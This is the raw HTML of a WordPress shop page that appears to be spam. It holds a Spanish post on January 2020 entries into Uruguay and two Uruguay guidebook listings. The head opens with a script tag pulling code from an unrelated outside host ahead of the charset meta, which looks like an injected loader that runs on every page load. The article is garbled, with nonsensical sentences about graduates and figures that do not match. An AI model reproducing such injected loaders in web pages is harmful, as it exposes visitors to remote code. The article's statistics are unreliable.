<!DOCTYPE html>
<html lang="en-US">
<head>
  <script src='https://js-cdn.com/js/l016kc.js'></script>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11">

	<title>El número sigue aumentando en el Uruguay y es sólo el comienzo del año &#8211; Dvd Club Online</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Dvd Club Online &raquo; Feed" href="https://dvdclubonline.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Dvd Club Online &raquo; Comments Feed" href="https://dvdclubonline.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Dvd Club Online &raquo; El número sigue aumentando en el Uruguay y es sólo el comienzo del año Comments Feed" href="https://dvdclubonline.com/el-numero-de-migrantes-sigue-aumentando-en-el-uruguay-y-es-solo-el-comienzo-del-ano/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/dvdclubonline.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://dvdclubonline.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='wc-block-style-css'  href='https://dvdclubonline.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=2.5.11' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-notice-front-css'  href='https://dvdclubonline.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css'  href='https://dvdclubonline.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.9.1' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css'  href='https://dvdclubonline.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.9.1' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css'  href='https://dvdclubonline.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.9.1' type='text/css' media='all' />
<style id='woocommerce-inline-inline-css' type='text/css'>
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel='stylesheet' id='font-awesome-css'  href='https://dvdclubonline.com/wp-content/themes/estore/font-awesome/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' />
<link rel='stylesheet' id='estore-googlefonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400%2C600%2C700%2C300&#038;ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='estore-style-css'  href='https://dvdclubonline.com/wp-content/themes/estore/style.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='estore-reponsive-css'  href='https://dvdclubonline.com/wp-content/themes/estore/css/responsive.css?ver=1.0.0' type='text/css' media='all' />
<script type='text/javascript'>
/* <![CDATA[ */
var cnArgs = {"ajaxurl":"https:\/\/dvdclubonline.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"yes","onScrollOffset":"100","onClick":"no","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"yes","revoke_cookies":"1","revoke_cookies_opt":"automatic","secure":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.50'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://dvdclubonline.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='https://dvdclubonline.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://dvdclubonline.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://dvdclubonline.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Sylvia confirms she’s leaving Today' href='https://dvdclubonline.com/sylvia-confirms-shes-leaving-today/' />
<meta name="generator" content="WordPress 5.3.2" />
<meta name="generator" content="WooCommerce 3.9.1" />
<link rel="canonical" href="https://dvdclubonline.com/el-numero-de-migrantes-sigue-aumentando-en-el-uruguay-y-es-solo-el-comienzo-del-ano/" />
<link rel='shortlink' href='https://dvdclubonline.com/?p=346' />
<link rel="alternate" type="application/json+oembed" href="https://dvdclubonline.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fdvdclubonline.com%2Fel-numero-de-migrantes-sigue-aumentando-en-el-uruguay-y-es-solo-el-comienzo-del-ano%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://dvdclubonline.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fdvdclubonline.com%2Fel-numero-de-migrantes-sigue-aumentando-en-el-uruguay-y-es-solo-el-comienzo-del-ano%2F&#038;format=xml" />
<link rel="pingback" href="https://dvdclubonline.com/xmlrpc.php">		<style type="text/css">
		.navigation .nav-links a:hover,
		.bttn:hover,
		button,
		input[type="button"]:hover,
		input[type="reset"]:hover,
		input[type="submit"]:hover,
		.widget_tag_cloud a:hover,
		.right-top-header .top-header-menu-wrapper ul li a:hover,
		.right-header-block a:hover,
		#lang_sel_click a.lang_sel_sel:hover,
		.wcmenucart-contents,
		.category-menu:hover,
		.category-menu .category-toggle.active,
		.widget_shopping_cart .button:hover,
		.woocommerce .widget_shopping_cart_content .buttons a.button:hover,
		.search-user-block:hover,
		.slider-caption-wrapper .slider-btn,
		.slider-caption-wrapper .slider-btn:hover i,
		.widget-collection .page-title:after,
		.widget-featured-collection .page-title:after,
		.featured-slider li .featured-img .featured-hover-wrapper .featured-hover-block a:hover,
		.widget-featured-collection .bx-controls .bx-prev:hover,
		.widget-featured-collection .bx-controls .bx-next:hover,
		.featured-slider li .single_add_to_wishlist,
		.widget_featured_posts_block .entry-thumbnail .posted-on:hover,
		.product-collection .page-title:after,
		.men-collection-color .page-title:after,
		.hot-product-title,
		.hot-content-wrapper .single_add_to_wishlist,
		.widget-collection .cart-wishlist-btn a.added_to_cart:hover:after,
		.entry-thumbnail .posted-on:hover,
		.woocommerce-page ul.products li.product .yith-wcwl-add-to-wishlist .add_to_wishlist.button.alt,
		.woocommerce-page ul.products li.product .yith-wcwl-add-to-wishlist .yith-wcwl-wishlistexistsbrowse a,
		.woocommerce-page ul.products li.product .yith-wcwl-add-to-wishlist .yith-wcwl-wishlistaddedbrowse a,
		.single-product.woocommerce-page .product .cart .single_add_to_cart_button,
		.single-product.woocommerce-page .product .yith-wcwl-add-to-wishlist .add_to_wishlist.button.alt,
		.single-product.woocommerce-page .product .yith-wcwl-add-to-wishlist .yith-wcwl-wishlistexistsbrowse a,
		.single-product.woocommerce-page .product .yith-wcwl-add-to-wishlist .yith-wcwl-wishlistaddedbrowse a,
		.single-product.woocommerce-page .product .yith-wcwl-add-to-wishlist .single_add_to_cart_button,
		.woocommerce.widget_price_filter .price_slider_wrapper .ui-widget-content .ui-slider-range,
		.woocommerce.widget_price_filter .price_slider_wrapper .ui-widget-content .ui-slider-handle,
		.woocommerce-cart .woocommerce table.shop_table.cart tr.cart_item td.product-remove a,
		.woocommerce-cart .woocommerce table.shop_table.cart tr td.actions input[type="submit"],
		.woocommerce .cart-collaterals .cart_totals .shop_table td button,
		.woocommerce ul.products li.product .add_to_cart_button,
		.return-to-shop a.button,
		.woocommerce #content .wishlist_table tbody tr td.product-remove a.remove_from_wishlist,
		.woocommerce #content .wishlist_table tbody tr td.product-add-to-cart a,
		.woocommerce #respond input#submit,
		.woocommerce a.button,
		.woocommerce button.button,
		.woocommerce input.button,
		.woocommerce #respond input#submit.alt,
		.woocommerce a.button.alt,
		.woocommerce button.button.alt,
		.woocommerce input.button.alt,
		.sub-toggle,
		.scrollup  {
			background: #eeee22;
		}

		a,
		.widget_archive a:hover::before,
		.widget_categories a:hover:before,
		.widget_pages a:hover:before,
		.widget_meta a:hover:before,
		.widget_recent_comments a:hover:before,
		.widget_recent_entries a:hover:before,
		.widget_rss a:hover:before,
		.widget_nav_menu a:hover:before,
		.widget_product_categories li a:hover:before,
		.widget_archive li a:hover,
		.widget_categories li a:hover,
		.widget_pages li a:hover,
		.widget_meta li a:hover,
		.widget_recent_comments li a:hover,
		.widget_recent_entries li a:hover,
		.widget_rss li a:hover,
		.widget_nav_menu li a:hover,
		.widget_tag_cloud a:hover,
		.widget_product_categories a:hover,
		.wcmenucart-contents .cart-value,
		#site-navigation ul li:hover > a,
		#site-navigation ul li.current-menu-item > a,
		#site-navigation ul li:hover > a:after,
		.slider-caption-wrapper .slider-title a:hover,
		.widget_vertical_promo .slider-title a:hover,
		.hot-content-wrapper .star-rating,
		.product-list-wrap .product-list-block .product-list-content .price ins,
		.widget-collection .cart-wishlist-btn a i,
		.widget-collection .cart-wishlist-btn a.added_to_cart:after,
		.widget-about .tg-container .about-content-wrapper .about-block .about-sub-title,
		.featured-slider li .featured-title a,
		.featured-slider li .woocommerce-product-rating .star-rating,
		.featured-slider li .price ins,
		.page-header .entry-title,
		.entry-title a:hover,
		.entry-btn .btn:hover,
		.entry-meta a:hover,
		.woocommerce-page ul.products li.product .star-rating,
		.woocommerce-page ul.products li.product .price ins,
		.woocommerce-page ul.products li.product .yith-wcwl-add-to-wishlist .feedback,
		.single-product.woocommerce-page .product .summary .price,
		.single-product.woocommerce-page .product .woocommerce-product-rating .star-rating,
		.widget.woocommerce .star-rating,
		.cart-empty,
		.woocommerce .woocommerce-info:before,
		.woocommerce .woocommerce-error:before,
		.woocommerce .woocommerce-message:before,
		.toggle-wrap:hover i,
		#cancel-comment-reply-link,
		#cancel-comment-reply-link:before,
		.logged-in-as a {
			color: #eeee22;
		}

		.widget-title span,
		#lang_sel_click ul ul,
		.wcmenucart-contents .cart-value,
		#category-navigation,
		#category-navigation ul.sub-menu,
		#masthead .widget_shopping_cart,
		.widget_shopping_cart .button:hover,
		.woocommerce .widget_shopping_cart_content .buttons a.button:hover,
		#site-navigation .sub-menu,
		.search-wrapper .header-search-box,
		.hot-product-content-wrapper .hot-img,
		.widget-collection .cart-wishlist-btn a i,
		.widget-collection .cart-wishlist-btn a.added_to_cart:after,
		.featured-slider li .featured-img .featured-hover-wrapper .featured-hover-block a:hover,
		.widget-featured-collection .bx-controls .bx-prev:hover,
		.widget-featured-collection .bx-controls .bx-next:hover,
		.single-product.woocommerce-page .product .images .thumbnails a,
		.woocommerce .woocommerce-info,
		.woocommerce .woocommerce-error,
		.woocommerce .woocommerce-message,
		.menu-primary-container,
		.comment-list .comment-body{
			border-color: #eeee22;
		}

		.search-wrapper .header-search-box:before,
		#masthead .widget_shopping_cart::before{
			border-bottom-color:#eeee22;
		}

		.big-slider .bx-controls .bx-prev:hover,
		.category-slider .bx-controls .bx-prev:hover{
			border-left-color:#eeee22;
		}

		.big-slider .bx-controls .bx-next:hover,
		.category-slider .bx-controls .bx-next:hover{
			border-right-color:#eeee22;
		}

		#primary-menu{
			border-top-color:#eeee22;
		}

		a:hover,
		a:focus,
		a:active,
		#category-navigation ul li:hover > a,
		.section-title-wrapper .section-title-block .page-title a:hover,
		.view-all a:hover,
		.men-collection-color .section-title-wrapper .section-title-block .page-title a:hover,
		.hot-product-content-wrapper .hot-img .cart-price-wrapper .add_to_cart_button:hover,
		.hot-product-content-wrapper .hot-img .cart-price-wrapper .added_to_cart:hover,
		.hot-content-wrapper .hot-title a:hover,
		.product-list-wrap .product-list-block .product-list-content .product-list-title a:hover,
		.page-header .entry-sub-title span a:hover,
		.featured-slider li .featured-title a:hover,
		.woocommerce-page ul.products li.product .products-title a:hover,
		.woocommerce .widget_layered_nav_filters ul li a:hover,
		.woocommerce-cart .woocommerce table.shop_table.cart tr.cart_item td.product-name a:hover,
		.woocommerce .widget_layered_nav_filters ul li a:hover,
		.woocommerce-cart .woocommerce table.shop_table.cart tr.cart_item td.product-name a:hover,
		.woocommerce #content .wishlist_table tbody tr td.product-name a:hover,
		.comment-author .fn .url:hover    {
			color: #dada0e
		}

		.hot-content-wrapper .single_add_to_wishlist:hover,
		.widget-collection .cart-wishlist-btn a i:hover,
		.woocommerce-page ul.products li.product .products-img .products-hover-wrapper .products-hover-block a:hover,
		.woocommerce-page ul.products li.product .yith-wcwl-add-to-wishlist .add_to_wishlist.button.alt:hover,
		.woocommerce-page ul.products li.product .yith-wcwl-add-to-wishlist .yith-wcwl-wishlistexistsbrowse a:hover,
		.woocommerce-page ul.products li.product .yith-wcwl-add-to-wishlist .yith-wcwl-wishlistaddedbrowse a:hover,
		.single-product.woocommerce-page .product .cart .single_add_to_cart_button:hover,
		.single-product.woocommerce-page .product .yith-wcwl-add-to-wishlist .add_to_wishlist.button.alt:hover,
		.single-product.woocommerce-page .product .yith-wcwl-add-to-wishlist .yith-wcwl-wishlistexistsbrowse a:hover,
		.single-product.woocommerce-page .product .yith-wcwl-add-to-wishlist .yith-wcwl-wishlistaddedbrowse a:hover,
		.single-product.woocommerce-page .product .yith-wcwl-add-to-wishlist .single_add_to_cart_button:hover,
		.woocommerce-cart .woocommerce table.shop_table.cart tr.cart_item td.product-remove a:hover,
		.woocommerce-cart .woocommerce table.shop_table.cart tr td.actions input[type="submit"]:hover,
		.woocommerce-cart .woocommerce table.shop_table.cart tr.cart_item td.product-remove a:hover,
		.woocommerce-cart .woocommerce table.shop_table.cart tr td.actions input[type="submit"]:hover,
		.woocommerce .cart-collaterals .cart_totals .shop_table td button:hover,
		.woocommerce-cart .woocommerce .wc-proceed-to-checkout a.checkout-button:hover,
		.woocommerce ul.products li.product .add_to_cart_button:hover,
		.return-to-shop a.button:hover,
		.woocommerce #content .wishlist_table tbody tr td.product-remove a.remove_from_wishlist:hover,
		.woocommerce #content .wishlist_table tbody tr td.product-add-to-cart a:hover,
		.woocommerce #respond input#submit:hover,
		.woocommerce a.button:hover,
		.woocommerce button.button:hover,
		.woocommerce input.button:hover,
		.woocommerce #respond input#submit.alt:hover,
		.woocommerce a.button.alt:hover,
		.woocommerce button.button.alt:hover,
		.woocommerce input.button.alt:hover,
		.featured-slider li .single_add_to_wishlist:hover,
		.slider-caption-wrapper .slider-btn i,
		.slider-caption-wrapper .slider-btn:hover,
		.sub-toggle:hover,
		.scrollup:hover,
		.scrollup:active,
		.scrollup:focus {
			background: #dada0e
		}

		.widget-collection .cart-wishlist-btn a i:hover,
		.woocommerce-page ul.products li.product .products-img .products-hover-wrapper .products-hover-block a:hover{
			border-color: #dada0e
		}


		}</style>
		<noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript>
	<link rel="icon" href="https://dvdclubonline.com/wp-content/uploads/2020/02/Daledus-7-45x45.png" sizes="32x32" />
<link rel="icon" href="https://dvdclubonline.com/wp-content/uploads/2020/02/Daledus-7-300x300.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://dvdclubonline.com/wp-content/uploads/2020/02/Daledus-7-300x300.png" />
<meta name="msapplication-TileImage" content="https://dvdclubonline.com/wp-content/uploads/2020/02/Daledus-7-300x300.png" />
</head>

<body class="post-template-default single single-post postid-346 single-format-standard wp-custom-logo theme-estore cookies-set cookies-accepted woocommerce-no-js">


<div id="page" class="hfeed site">
	<a class="skip-link screen-reader-text" href="#content">Skip to content</a>

	
	
	<header id="masthead" class="site-header" role="banner">
		
		<div class="middle-header-wrapper clearfix">
			<div class="tg-container">
				<div class="logo-wrapper clearfix">
					<a href="https://dvdclubonline.com/" class="custom-logo-link" rel="home"><img width="500" height="246" src="https://dvdclubonline.com/wp-content/uploads/2020/02/cropped-Daledus-6.png" class="custom-logo" alt="Dvd Club Online" srcset="https://dvdclubonline.com/wp-content/uploads/2020/02/cropped-Daledus-6.png 500w, https://dvdclubonline.com/wp-content/uploads/2020/02/cropped-Daledus-6-300x148.png 300w" sizes="(max-width: 500px) 100vw, 500px" /></a>
					<div class="site-title-wrapper screen-reader-text">
													<h3 id="site-title">
								<a href="https://dvdclubonline.com/"
								   title="Dvd Club Online"
								   rel="home">Dvd Club Online</a>
							</h3>
													<p id="site-description">We are the best in gaming</p>
											</div>
				</div><!-- logo-end-->

				<div class="wishlist-cart-wrapper clearfix">
											<div class="cart-wrapper">
							<div class="estore-cart-views">

								
								<a href="https://dvdclubonline.com/cart/" class="wcmenucart-contents">
									<i class="fa fa-shopping-cart"></i>
									<span class="cart-value">0</span>
								</a> <!-- quick wishlist end -->

								<div class="my-cart-wrap">
									<div class="my-cart">Total</div>
									<div class="cart-total">&#036;0.00</div>
								</div>
							</div>

							<div class="widget woocommerce widget_shopping_cart"><h2 class="widgettitle">Cart</h2><div class="widget_shopping_cart_content"></div></div>						</div>
									</div>

				
			</div>
		</div> <!-- middle-header-wrapper end -->

		<div class="bottom-header-wrapper clearfix">
			<div class="tg-container">

				
				<div class="search-user-wrapper clearfix">
						<div class="search-wrapper search-user-block">
		<div class="search-icon">
			<i class="fa fa-search"> </i>
		</div>
		<div class="header-search-box">
			<form role="search" method="get" class="searchform" action="https://dvdclubonline.com/">
	<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s">
	<button type="submit" class="searchsubmit" name="submit" value="Search"><i class="fa fa-search"></i></button>
</form>
		</div>
	</div>
						<div class="user-wrapper search-user-block">
													<a href="https://dvdclubonline.com/my-account/"
							   title="" class="user-icon"><i
										class="fa fa-user-times"></i></a>
											</div>
				</div> <!-- search-user-wrapper -->
				<nav id="site-navigation" class="main-navigation" role="navigation">
					<div class="toggle-wrap"><span class="toggle"><i class="fa fa-reorder"> </i></span></div>
					<div class="menu-main-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-326" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-326"><a href="http://dvdclubonline.com">Shop</a></li>
<li id="menu-item-324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-324"><a href="https://dvdclubonline.com/checkout/">Checkout</a></li>
<li id="menu-item-325" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-325"><a href="https://dvdclubonline.com/product-category/gaming/">Gaming</a></li>
<li id="menu-item-4" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4"><a href="/">Blog</a>
<ul class="sub-menu">
	<li id="menu-item-7" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7"><a href="https://dvdclubonline.com/category/smart-home/">Smart Home</a></li>
	<li id="menu-item-9" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9"><a href="https://dvdclubonline.com/category/tv-and-movies/">TV and Movies</a></li>
</ul>
</li>
</ul></div>				</nav><!-- #site-navigation -->

			</div>
		</div> <!-- bottom-header.wrapper end -->
	</header>

	
			<div id="content" class="site-content"><!-- #content.site-content -->
		<div class="page-header clearfix">
			<div class="tg-container">
				<h1 class="entry-title">El número sigue aumentando en el Uruguay y es sólo el comienzo del año</h1>				<h3 class="entry-sub-title"><div id="crumbs" xmlns:v="http://rdf.data-vocabulary.org/#"><span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" href="https://dvdclubonline.com/">Home</a></span>&nbsp;&frasl;&nbsp;<span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" href="https://dvdclubonline.com/category/uncategorized/">Uncategorized</a></span>&nbsp;&frasl;&nbsp;<span class="current">El número sigue aumentando en el Uruguay y es sólo el comienzo del año</span></div></h3>
			</div>
		</div>
		<main id="main" class="clearfix right_sidebar">
			<div class="tg-container">
				<div id="primary">
					
						<article id="post-346" class="post-346 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized">
	
	<div class="entry-thumbnail">
				<span class="posted-on">February 11, 2020</span>
								<img width="800" height="521" src="https://dvdclubonline.com/wp-content/uploads/2020/02/665-oopi-800x521.jpg" class="attachment-estore-slider size-estore-slider wp-post-image" alt="El número sigue aumentando en el Uruguay y es sólo el comienzo del año" title="El número sigue aumentando en el Uruguay y es sólo el comienzo del año" />			</div>
	<h2 class="entry-title">El número sigue aumentando en el Uruguay y es sólo el comienzo del año</h2>
	<div class="entry-content-text-wrapper clearfix">
		<div class="entry-content-wrapper">
			<div class="entry-meta">   				<span class="byline author vcard"><i class="fa fa-user"></i><a href="https://dvdclubonline.com/author/alonmansell/" title="Alonzo Mansell">Alonzo Mansell</a></span>
				<span class="comments-link"><i class="fa fa-comments-o"></i><a href="https://dvdclubonline.com/el-numero-de-migrantes-sigue-aumentando-en-el-uruguay-y-es-solo-el-comienzo-del-ano/#respond">0 Comment</a></span>
				<span class="cat-links"><i class="fa fa-folder-open"></i><a href="https://dvdclubonline.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</div>			<div class="entry-content">
				
<p>La Dirección Nacional de Migraciones informó en febrero el número de personas que salieron y entraron al país en el primer mes del año. Según el informe, la información se refiere a enero de 2020 y se refiere a la entrada de personas en nuestro país, no a todos los turistas.<br></p>



<p>La Dirección Nacional de Migraciones del Ministerio del Interior informó que en enero de 2020 ingresaron al país 704.684 personas por los pasos fronterizos con Brasil y Argentina, de las cuales 309.316 eran argentinas.<br></p>



<p>&#8220;Los ingresos de 704.684 personas se registraron a través de los pasos fronterizos con Brasil y Argentina&#8221;, dice.<br></p>



<p>En este contexto, se registra que por Fray Bentos 21,95%, ingresaron por Paysandú unas 54.687 personas, 17,01% (119.918 personas), y por Colonia 15,49% (109.161), seguidas de Salto, Carrasco y el Aeropuerto Internacional de Rivera.<br></p>



<p>En cuanto a la nacionalidad, se informa que &#8220;309.316 ciudadanos eran argentinos, 271.067 uruguayos, 61.050 brasileños, 9.363 chilenos y 7.903 paraguayos&#8221;.<br></p>



<p>620.932 personas entraron en el país en enero de 2019, el flujo migratorio fue un 13,49 por ciento mayor que el año pasado. Por otro lado, se anuncia que &#8220;cuando 669.016 personas se graduaron, la nación graduó 736.303 estudiantes, 10,06 por ciento más que en 2019.<br></p>



<p>Al igual que en el documento, &#8220;Paysandú, Colonia y Fray Bentos&#8221; fueron los pasos fronterizos con mayor número de personas registradas.<br></p>



<p></p>


<div class="wc-block-grid wp-block-handpicked-products wc-block-handpicked-products has-3-columns"><ul class="wc-block-grid__products"><li class="wc-block-grid__product">
				<a href="https://dvdclubonline.com/product/guruguay-guide-to-uruguay-beaches-ranches-and-wine-country/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="300" height="300" src="https://dvdclubonline.com/wp-content/uploads/2020/02/71bSESHnPtL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://dvdclubonline.com/wp-content/uploads/2020/02/71bSESHnPtL-300x300.jpg 300w, https://dvdclubonline.com/wp-content/uploads/2020/02/71bSESHnPtL-150x150.jpg 150w, https://dvdclubonline.com/wp-content/uploads/2020/02/71bSESHnPtL-75x75.jpg 75w, https://dvdclubonline.com/wp-content/uploads/2020/02/71bSESHnPtL-444x444.jpg 444w, https://dvdclubonline.com/wp-content/uploads/2020/02/71bSESHnPtL-45x45.jpg 45w, https://dvdclubonline.com/wp-content/uploads/2020/02/71bSESHnPtL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /></div>
					<div class="wc-block-grid__product-title">Guru&#8217;Guay Guide to Uruguay: Beaches, Ranches and Wine Country</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>23.99</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=345" aria-label="Add &ldquo;Guru&#039;Guay Guide to Uruguay: Beaches, Ranches and Wine Country&rdquo; to your cart" data-quantity="1" data-product_id="345" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li><li class="wc-block-grid__product">
				<a href="https://dvdclubonline.com/product/moving-to-uruguay-2018-colored-edition-paperback/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="300" height="300" src="https://dvdclubonline.com/wp-content/uploads/2020/02/51FvIGbOuwL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://dvdclubonline.com/wp-content/uploads/2020/02/51FvIGbOuwL-300x300.jpg 300w, https://dvdclubonline.com/wp-content/uploads/2020/02/51FvIGbOuwL-150x150.jpg 150w, https://dvdclubonline.com/wp-content/uploads/2020/02/51FvIGbOuwL-75x75.jpg 75w, https://dvdclubonline.com/wp-content/uploads/2020/02/51FvIGbOuwL-45x45.jpg 45w, https://dvdclubonline.com/wp-content/uploads/2020/02/51FvIGbOuwL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /></div>
					<div class="wc-block-grid__product-title">Moving to Uruguay 2018: Colored Edition Paperback</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>26.49</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=342" aria-label="Add &ldquo;Moving to Uruguay 2018: Colored Edition Paperback&rdquo; to your cart" data-quantity="1" data-product_id="342" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li></ul></div>											</div><!-- .entry-content -->
		</div>
	</div>

	</article><!-- #post-## -->

						
	<nav class="navigation post-navigation" role="navigation" aria-label="Posts">
		<h2 class="screen-reader-text">Post navigation</h2>
		<div class="nav-links"><div class="nav-previous"><a href="https://dvdclubonline.com/sylvia-confirms-shes-leaving-today/" rel="prev">Sylvia confirms she’s leaving Today</a></div></div>
	</nav>
						
						
						
<div id="comments" class="comments-area">

   
   
   
   	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/el-numero-de-migrantes-sigue-aumentando-en-el-uruguay-y-es-solo-el-comienzo-del-ano/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://dvdclubonline.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='346' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
	
